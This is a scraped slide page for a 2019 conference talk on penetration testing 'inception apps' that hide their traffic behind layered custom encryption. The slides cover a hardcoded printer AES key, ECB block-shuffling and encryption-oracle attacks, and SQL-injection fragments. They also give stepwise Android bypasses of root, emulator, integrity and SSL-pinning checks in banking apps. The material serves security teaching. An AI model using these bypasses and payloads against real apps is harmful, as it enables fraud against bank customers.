Advertisement
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.

Check these out next

Kong API Gateway
Kong API Gateway
Chris Mague
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
ZuzannaKornecka
Security Testing by Ken De Souza
Security Testing by Ken De Souza
QA or the Highway
Malware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
The Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect Data
Andy LoPresto
Creating Responsive Experiences
Creating Responsive Experiences
Tim Kadlec
Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"
IT Event
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2: We already know
qqlan
1 of 78

We need t go deeper - Testing inception apps.

Jun. 4, 2019
Download to read offline
Software

When it comes to thick-clients, java applets, embedded devices or mobile apps - often, the idea is to forget about HTTP/S stack, plaintext POST parameters, and instead, implement a custom communication protocol. - Sending files for printing? Caesar cipher does not support full UTF-8, so use AES in ECB mode. - Malware attacking online banking? Even over HTTPS, double-encrypt POST parameters. If your clients are rich, use asymetric encryption, for better protection. - Planning SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection. Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography. Ideas that usually implement methods of 'security by obscurity'. Once the outer layer of obfuscation is off, very often the server backend reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from enterprise solutions tests which require a bit more effort to allow tampering with data send from the client: - intercepting the traffic, bypassing NAC - decapsulating encryption and encoding layers - hooking into function calls, modifying packages - reverse-engineer proprietary protocols and encryption.

SecuRing
IT Security Expert, Owner at SecuRing, OWASP Poland Chapter Leader
Advertisement
Advertisement
Advertisement

Recommended

Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton4K views53 slides
Better watch your apps - MJ KeithBetter watch your apps - MJ Keith
Better watch your apps - MJ Keithm j3K views53 slides
Emerging threats jonkman_sans_cti_summit_2015Emerging threats jonkman_sans_cti_summit_2015
Emerging threats jonkman_sans_cti_summit_2015Emerging Threats2.6K views79 slides
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill10.4K views60 slides
Smit WiFi_2Smit WiFi_2
Smit WiFi_2mutew727 views46 slides
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful National Cheng Kung University1.6K views62 slides

More Related Content

Similar to We need t go deeper - Testing inception apps.(20)

Kong API Gateway Kong API Gateway
Kong API Gateway
Chris Mague3K views
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
ZuzannaKornecka22.6K views
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De Souza
QA or the Highway464 views
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross336 views
The Thing About Protecting Data Is, You Have To Protect DataThe Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect Data
Andy LoPresto366 views
Creating Responsive ExperiencesCreating Responsive Experiences
Creating Responsive Experiences
Tim Kadlec1.1K views
Aleksey Bogachuk - "Offline Second"Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"
IT Event229 views
SCADA StrangeLove 2: We already knowSCADA StrangeLove 2: We already know
SCADA StrangeLove 2: We already know
qqlan5.9K views
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?
Charles Givre382 views
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015
GregMefford4.3K views
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier4.3K views
Performance Risk ManagementPerformance Risk Management
Performance Risk Management
Viswanath Chittoory294 views
Evolveum: IDM story for a growing companyEvolveum: IDM story for a growing company
Evolveum: IDM story for a growing company
Evolveum267 views
BulletproofBulletproof
Bulletproof
Godfrey Nolan1.4K views
Mobile securityMobile security
Mobile security
Chaddy Huussin256 views
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user group
Hadoop User Group10.3K views
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloud
randomuserid11 views
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...
Ken DeSouza963 views
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd1.3K views
How to secure web applicationsHow to secure web applications
How to secure web applications
Mohammed A. Imran2K views

More from SecuRing(20)

Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4Developers
SecuRing42 views
Developer in a digital crosshair, 2022 edition - Oh My H@ck!Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
SecuRing192 views
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON Name
SecuRing107 views
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!
SecuRing270 views
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!
SecuRing154 views
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments
SecuRing1.4K views
Developer in a digital crosshair, 2022 editionDeveloper in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 edition
SecuRing148 views
20+ Ways To Bypass Your Macos Privacy Mechanisms20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms
SecuRing921 views
How secure are webinar platforms?How secure are webinar platforms?
How secure are webinar platforms?
SecuRing123 views
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
SecuRing606 views
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
SecuRing1.2K views
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
SecuRing2.2K views
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing289 views
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing218 views
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
SecuRing376 views
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing2.9K views
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
SecuRing992 views
Budowanie i hakowanie nowoczesnych aplikacji iOSBudowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOS
SecuRing263 views
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
SecuRing645 views
Artificial Intelligence – a buzzword, new era of IT or new threats?Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?
SecuRing366 views
Advertisement

Recently uploaded(20)

Future Direction of WIndows CE System Architecture.pptFuture Direction of WIndows CE System Architecture.ppt
Future Direction of WIndows CE System Architecture.ppt
Marco Wang3 views
【本科生、研究生】英国伦敦都会大学毕业证文凭购买指南【本科生、研究生】英国伦敦都会大学毕业证文凭购买指南
【本科生、研究生】英国伦敦都会大学毕业证文凭购买指南
sutseu0 views
Optimize Your Inventory, Boost Your Sales with SAP F&R.docxOptimize Your Inventory, Boost Your Sales with SAP F&R.docx
Optimize Your Inventory, Boost Your Sales with SAP F&R.docx
BeyzaPehlivan37 views
Finding your Receipt on FB Finding your Receipt on FB
Finding your Receipt on FB
Silver Caprice23 views
software companies in oamn muscat.pptxsoftware companies in oamn muscat.pptx
software companies in oamn muscat.pptx
WideSolutions4 views
如何办理一份高仿俄克拉荷马州立大学毕业证成绩单?如何办理一份高仿俄克拉荷马州立大学毕业证成绩单?
如何办理一份高仿俄克拉荷马州立大学毕业证成绩单?
aazepp3 views
【本科生、研究生】美国威廉玛丽学院毕业证文凭购买指南【本科生、研究生】美国威廉玛丽学院毕业证文凭购买指南
【本科生、研究生】美国威廉玛丽学院毕业证文凭购买指南
sutseu0 views
Geminate IM Voice SpeakerGeminate IM Voice Speaker
Geminate IM Voice Speaker
Geminate Consultancy Services0 views
Project Workflow Management Ultimate GuideProject Workflow Management Ultimate Guide
Project Workflow Management Ultimate Guide
Kashish Trivedi3 views
Laravel.pptxLaravel.pptx
Laravel.pptx
KaustubhBhandari60 views
Clinic Management System Clinic Management System
Clinic Management System
Geminate Consultancy Services0 views
Procert Authentication Platform by McarbonProcert Authentication Platform by Mcarbon
Procert Authentication Platform by Mcarbon
Mcarbon Tech Innovation Pvt Ltd2 views
lecture 6 DES part1.pdflecture 6 DES part1.pdf
lecture 6 DES part1.pdf
ssuser6c541312 views
software companies in oamn muscat.pdfsoftware companies in oamn muscat.pdf
software companies in oamn muscat.pdf
WideSolutions3 views
Business WhatsApp by McarbonBusiness WhatsApp by Mcarbon
Business WhatsApp by Mcarbon
Mcarbon Tech Innovation Pvt Ltd3 views
a-project-report-on-college-management-system.pdfa-project-report-on-college-management-system.pdf
a-project-report-on-college-management-system.pdf
AbenezerBekele100 views
PyCon Ireland 2022 - PyArrow full stack.pdfPyCon Ireland 2022 - PyArrow full stack.pdf
PyCon Ireland 2022 - PyArrow full stack.pdf
Alessandro Molina5 views
【本科生、研究生】加拿大温尼伯技术学院毕业证文凭购买指南【本科生、研究生】加拿大温尼伯技术学院毕业证文凭购买指南
【本科生、研究生】加拿大温尼伯技术学院毕业证文凭购买指南
sutseu0 views
C++_programs.pptC++_programs.ppt
C++_programs.ppt
EPORI2 views
How to Implement Personalised Voice Notification service.pptxHow to Implement Personalised Voice Notification service.pptx
How to Implement Personalised Voice Notification service.pptx
Enablex15 views

We need t go deeper - Testing inception apps.

  1. We need to go deeper Testing inception apps Jakub Kaluzny CONFidence, June 2019
  2. DevSecOps B64: dXNlcm5hbWUK=YWRtaW4K&c GFzc3dvcmQK=YWJjCg%3d%3d HTTP username=admin&password=abc HTTP DAST scanner in CI/CD pipeline SQLi Is it fixed? Base64_decode(„YWJjCg==’ OR 1=1”)
  3. JAKUB KALUZNY • 10 years in IT & Security • Threat modeling, DevSecOps, penetration tests • Poland, Spain, Australia • banking, fintech, law, airline, entertainment, e-commerce • Speaker at BlackHat, HackInTheBox, ZeroNights Who
  4. What is this all about? HTTP username=admin&password=abc HTTP username=admin&password=abc SSL Wireshark
  5. Protection against what? Sniffing, Man-in-The-Middle SQL Injection, cross-user access control, business logic
  6. What is this all about? dXNlcm5hbWUK=YWRtaW4K&c GFzc3dvcmQK=YWJjCg%3d%3d HTTP username=admin&password=abc HTTP HTTP username=admin&password=abc SSL SSL Local HTTP proxy Custom script Wireshark
  7. Inception apps AES encrypted: c6fa10bd98a6c4e778eac Binary protocol SSL Key exchange during activation Mobile app – obfuscated Emulator and root/jailbreak detection
  8. • Raising the bar: • For attackers? • For testers? • Money: • Scoping a test? • Risk • Attack surface coverage? • Security level? Why?
  9. • Technical examples • Business consequences • And discuss pentesting processes in general What
  10. LET’S GET TO IT
  11. Example 1 Enterprise printers – Pull Printing PRINTERWORKSTATION PRINT SERVER https://www.slideshare.net/wojdwo/hitb-kaluzny-final
  12. In the middle of printers
  13. Printers down under – AES
  14. • JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key - AES Hidden gem – SD card
  15. Example 1 – decompiled JAR
  16. • JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key - AES • It’s the same everywhere! • No remote firmware update! Example 1
  17. Attack flow Threat actor Crown jewels Sniff the communication Get the SD card Extract the key Apply decryption
  18. In the middle of printers - revisited S E R V E R P R I N T E R constant 263B 96B, “X” B, 128B always different 64 B many identical 16B blocks HELLO HELLO, CERTIFICATE SESSION KEY PostScript, ECB mode
  19. ECB encryption mode for PostScript files Each block encrypted separately ECB is bad https://en.wikipedia.org/wiki/ECB_mode
  20. In the middle of printers - revisited S E R V E R P R I N T E R constant 263B 96B, “X” B, 128B always different 64 B many identical 16B blocks HELLO HELLO, CERTIFICATE SESSION KEY PostScript, ECB mode
  21. Attack flow Threat actor Crown jewels Sniff the communication Communication analysis Decryption script Data extraction Access to plaintext files, no access control
  22. MORE
  23. Web app, AES comms, no key access HTTP Action=buy&Product=137&name=Kaluzny HTTP magic_string=abcdef1234567890… HTTP magic_string=abcdef1234567890… HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50
  24. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 11b3215b7764e11fbff4c1db3aa73925 e479b31f1313d3c7bf78585f77f3f17d c69bb9650a3bfb6e9137e218c7267da6 a57fcd28cc90574b00374cc42f224dd3 Magic string magic_string=b0dc782f6bd9 acce9bc3e9c8317b05125bb51 d9cbc4bfa56d41d7db1489f9b bcc2cc45f774773e8adde9c41 ecd62c5bc1faafa1d2553661c 8b83012f7e968d511b3215b77 64e11fbff4c1db3aa7325e479 b31f1313d3c7bf78585f77f3f 17dc69bb9650a3bfb6e9137e2 18c7267da6a57fcd28cc9074b 00374cc42f224dd3 magic_string=b0dc782f6bd9 acce9bc3e9c8317bb6e9137e2 18c7267da6a57fcd28cc9074b 00374cc42f224dd3’ OR 1=1
  25. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 11b3215b7764e11fbff4c1db3aa73925 e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
  26. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
  27. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi aaaaaaaaaaaaaa aKaluznyaaaaaa aaaaaaaaaaa, your price is 1500.50
  28. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
  29. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aluznyaaaaaaaaaaaaaaa…
  30. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =luznyaaaaaaaaaaaaaaa…
  31. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaaa…
  32. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaa…
  33. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaaa…
  34. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” Encryption Oracle Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaX.Y.Z.A, your price is 1500.50
  35. B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item” 5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500” c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn” c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us” 179762d5bba72ce4700aad2a96f5121d „er=admin&passwo” e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=” Encryption Oracle 031531894944dd25e457746a02f7eacf „&arbitrary=asd&&” 820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
  36. Web app, AES comms, no key access HTTP Action=buy&Product=137&name=Kaluzny HTTP magic_string=abcdef1234567890… HTTP magic_string=abcdef1234567890… HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50 API
  37. Attack flow Threat actor Crown jewels Tamper with parameters Communication analysis Encryption oracle Lateral movement Credentials would never be sent unencrypted
  38. MITB MALWARE DETECTION IN JAVASCRIPT
  39. MiTB malware - WebInjects <title>Bank</title> … Password: <input type=text> <script src=//malware> <title>Bank</title> … Password: <input type=text>
  40. MiTB malware detection in JS <script src=//antimalware> <script src=//malware> <title>Bank</title> …
  41. JS-based MiTB malware detection MiTB malware detection in JavaScript eval Obfuscation – base64, hex RSA encryption signatures reasoning engine Web Service rsa public key https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence @molejarka, @j_kaluzny
  42. Attack flow Threat actor Crown jewels Tamper with parameters Deobfuscate JS Extract RSA keys Decrypt communication
  43. MiTB malware detection in JS <script src=//antimalware> <script src=//malware> <title>Bank</title> …
  44. TESTING MOBILE BANKING IN 2019
  45. Mobile banking in early 2010s OK Hi, I want to send $5 Standard SSL
  46. Attack flow – Android – inception level 1 Threat actor Crown jewels Tamper with parameters Add local proxy CA
  47. • Export CA from local proxy • Push it to the device • Intercept traffic Androd – inception level 1
  48. Mobile banking in early 2010s OK Hi, I want to send $5 SSL pinning
  49. Modifying a hardcoded certificate: • Unpack APK • Change certificate in resources • Pack the app, sign it Attack flow – inception level 2
  50. Attack flow – inception level 2 Threat actor Crown jewels Tamper with parameters Bypass hardcoded SSL pinning checks Set the proxy
  51. • Decompile APK to Smali code • „Void” the pinning methods or change the certificate: • Find the interesting methods • Delete the code, leaving „return-void” at the end • Build it, sign it Attack flow – inception level 2
  52. Testing mobile banking in late 2010s, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning HTTP body encryption
  53. HTTP body encryption payload=e47bf2dcd90af0d3366f 4bacfe932ffae47bf2dcd90af0d33 SSL HTTP
  54. Testing mobile banking in late 2010s, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
  55. Attack flow – Android – 7 layers of inception Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin
  56. • Decompile APK to Smali code • „Void” the integrity checks Attack flow – Android – inception level 1/7
  57. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • Second root check runs a minute after the first! Attack flow – Android – inception level 2/7
  58. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection Attack flow – Android – inception level 3/7
  59. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning Attack flow – Android – inception level 4/7
  60. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” Attack flow – Android – inception level 5/7
  61. Example 4 – mobile banking in 2019, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
  62. Example 4 – mobile banking in 2019, Poland 1c45a9eef01775077dac93add52595 The key will be 0000000000 Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
  63. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” • Develop a custom Burp plugin Attack flow – Android – inception level 6/7
  64. Burp plugin – „Deszyfrator” @slawekja
  65. Attack flow – Android – inception level 7/7 Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin You are in position to start testing
  66. SOAP – Simple Object Access Protocol WCF BINARY XML - SOAP TCP START-TLS Let’s call it tnSOAP – totally not SOAP
  67. mitm_relay for START-TLS [thick client] ----▶ [mitm_relay] ----▶ [destination server] | ▲ ▼ | [local proxy] < Intercept and | ▲ modify traffic here ▼ | [dummy webserver] https://github.com/jrmdev/mitm_relay
  68. WCF data – python-wcfbin by ERNW [jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org"> <soap:Header> </soap:Header> <soap:Body> <m:GetStockPrice> <m:StockName>GOOG</m:StockName> </m:GetStockPrice> </soap:Body> </soap:Envelope> 00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...| 00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa| 00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..| 00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc| 00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam| 00000050 65 9f 03 18 e3 86 01 01 01 |e........| 00000059
